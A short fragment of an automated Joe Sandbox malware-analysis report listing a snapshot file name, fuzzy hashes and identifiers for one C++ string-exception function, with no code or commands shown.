                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                      • String ID: invalid string position
                                      • API String ID: 1659287814-1799206989
                                      • Opcode ID: 9a74eec29dfe59f53376a35615c70281be4292f5270556b9bc16010e0bf9c945
                                      • Instruction ID: 15de0b003629b10cb601b6dafacaad86026be428857383e35fba93a10ad688e6
                                      • Opcode Fuzzy Hash: 9a74eec29dfe59f53376a35615c70281be4292f5270556b9bc16010e0bf9c945
                                      • Instruction Fuzzy Hash: 4701D6323102585BC3258EACEC80A7AF7ABEB94794B24493DE281CB741D6B1EC51C7A4